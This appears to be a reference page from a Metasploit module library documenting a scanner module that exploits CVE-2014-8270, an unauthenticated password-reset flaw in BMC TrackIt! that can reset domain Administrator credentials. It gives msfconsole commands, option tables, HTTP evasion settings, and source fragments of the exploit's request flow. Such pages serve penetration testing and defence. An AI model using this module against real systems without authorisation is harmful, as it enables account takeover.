BMC TrackIt! Unauthenticated Arbitrary User Password Change - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/bmc_trackit_passwd_reset metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: BMC TrackIt! Unauthenticated Arbitrary User Password Change
Module: auxiliary/scanner/http/bmc_trackit_passwd_reset
Source code: modules/auxiliary/scanner/http/bmc_trackit_passwd_reset.rb
Disclosure date: 2014-12-09
Last modification time: 2022-01-23 15:28:32 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-8270

This module exploits a flaw in the password reset mechanism in BMC TrackIt! 11.3 and possibly prior versions. If the password reset service is configured to use a domain administrator (which is the recommended configuration), then domain credentials can be reset (such as domain Administrator).

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/bmc_trackit_passwd_reset
msf auxiliary(bmc_trackit_passwd_reset) > show options
    ... show and set options ...
msf auxiliary(bmc_trackit_passwd_reset) > set RHOSTS ip-range
msf auxiliary(bmc_trackit_passwd_reset) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(bmc_trackit_passwd_reset) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(bmc_trackit_passwd_reset) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(bmc_trackit_passwd_reset) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/bmc_trackit_passwd_reset auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/bmc_trackit_passwd_reset

msf6 auxiliary(scanner/http/bmc_trackit_passwd_reset) > show info

       Name: BMC TrackIt! Unauthenticated Arbitrary User Password Change
     Module: auxiliary/scanner/http/bmc_trackit_passwd_reset
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-12-09

Provided by:
  bperry
  jhart

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
  LOCALPASS                   no        The password to set for the local user (blank for random)
  LOCALUSER  Administrator    yes       The user to change password for
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to BMC TrackIt!
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a flaw in the password reset mechanism in BMC 
  TrackIt! 11.3 and possibly prior versions. If the password reset 
  service is configured to use a domain administrator (which is the 
  recommended configuration), then domain credentials can be reset 
  (such as domain Administrator).

References:
  http://www.zerodayinitiative.com/advisories/ZDI-14-419/
  https://nvd.nist.gov/vuln/detail/CVE-2014-8270

Module Options


This is a complete list of options available in the scanner/http/bmc_trackit_passwd_reset auxiliary module:

msf6 auxiliary(scanner/http/bmc_trackit_passwd_reset) > show options

Module options (auxiliary/scanner/http/bmc_trackit_passwd_reset):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN                      no        The domain of the user. By default the local user's computer name will be autodetected
   LOCALPASS                   no        The password to set for the local user (blank for random)
   LOCALUSER  Administrator    yes       The user to change password for
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to BMC TrackIt!
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/bmc_trackit_passwd_reset auxiliary module:

msf6 auxiliary(scanner/http/bmc_trackit_passwd_reset) > show advanced

Module advanced options (auxiliary/scanner/http/bmc_trackit_passwd_reset):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/bmc_trackit_passwd_reset module can do:

msf6 auxiliary(scanner/http/bmc_trackit_passwd_reset) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/bmc_trackit_passwd_reset auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/bmc_trackit_passwd_reset) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER>: unable to request <URI>: <E>


Here is a relevant code snippet related to the "<PEER>: unable to request <URI>: <E>" error message:

48:	  def password_reset
49:	    begin
50:	      uri = normalize_uri(target_uri.path, 'PasswordReset')
51:	      send_request_cgi('uri' => uri)
52:	    rescue => e
53:	      vprint_error("#{peer}: unable to request #{uri}: #{e}")
54:	      nil
55:	    end
56:	  end
57:	
58:	  def check_host(ip)

<PEER>: Track-It! version <VERSION> is not less than <FIX_VERSION>


Here is a relevant code snippet related to the "<PEER>: Track-It! version <VERSION> is not less than <FIX_VERSION>" error message:

75:	            refs: references
76:	          )
77:	          vprint_status("#{peer}: Track-It! version #{version} is less than #{fix_version}")
78:	          return Exploit::CheckCode::Vulnerable
79:	        else
80:	          vprint_status("#{peer}: Track-It! version #{version} is not less than #{fix_version}")
81:	          return Exploit::CheckCode::Safe
82:	        end
83:	      else
84:	        vprint_error("#{peer}: unable to get Track-It! version")
85:	        return Exploit::CheckCode::Unknown

<PEER>: unable to get Track-It! version


Here is a relevant code snippet related to the "<PEER>: unable to get Track-It! version" error message:

79:	        else
80:	          vprint_status("#{peer}: Track-It! version #{version} is not less than #{fix_version}")
81:	          return Exploit::CheckCode::Safe
82:	        end
83:	      else
84:	        vprint_error("#{peer}: unable to get Track-It! version")
85:	        return Exploit::CheckCode::Unknown
86:	      end
87:	    else
88:	      vprint_status("#{peer}: does not appear to be running Track-It!")
89:	      return Exploit::CheckCode::Safe

<PEER>: does not appear to be running Track-It!


Here is a relevant code snippet related to the "<PEER>: does not appear to be running Track-It!" error message:

83:	      else
84:	        vprint_error("#{peer}: unable to get Track-It! version")
85:	        return Exploit::CheckCode::Unknown
86:	      end
87:	    else
88:	      vprint_status("#{peer}: does not appear to be running Track-It!")
89:	      return Exploit::CheckCode::Safe
90:	    end
91:	  end
92:	
93:	  def run_host(ip)

<PEER>: unable to obtain domain name. Try specifying DOMAIN


Here is a relevant code snippet related to the "<PEER>: unable to obtain domain name. Try specifying DOMAIN" error message:

107:	    if datastore['DOMAIN'].blank?
108:	      if res.body =~ /"domainName":"([^"]*)"/
109:	        domain = Regexp.last_match(1)
110:	        vprint_status("#{peer}: found domain name: #{domain}")
111:	      else
112:	        print_error("#{peer}: unable to obtain domain name.  Try specifying DOMAIN")
113:	        return
114:	      end
115:	    else
116:	      domain = datastore['DOMAIN']
117:	    end

<PEER>: Could not register <FULL_USER>


Here is a relevant code snippet related to the "<PEER>: Could not register <FULL_USER>" error message:

134:	        'confirmanswer' => answers.last
135:	      }
136:	    )
137:	
138:	    if !res || res.body != "{\"success\":true,\"data\":{\"userUpdated\":true}}"
139:	      print_error("#{peer}: Could not register #{full_user}")
140:	      return
141:	    end
142:	
143:	    vprint_status("#{peer}: changing password for #{full_user}")
144:	

<PEER>: Could not change <FULL_USER>'s password -- is it a domain or local user?


Here is a relevant code snippet related to the "<PEER>: Could not change <FULL_USER>'s password -- is it a domain or local user?" error message:

159:	        'CkbResetpassword' => 'true'
160:	      }
161:	    )
162:	
163:	    if !res || res.body != '{"success":true,"data":{"PasswordResetStatus":0}}'
164:	      print_error("#{peer}: Could not change #{full_user}'s password -- is it a domain or local user?")
165:	      return
166:	    end
167:	
168:	    report_vuln(
169:	      host: ip,

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • bperry
  • jhart

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.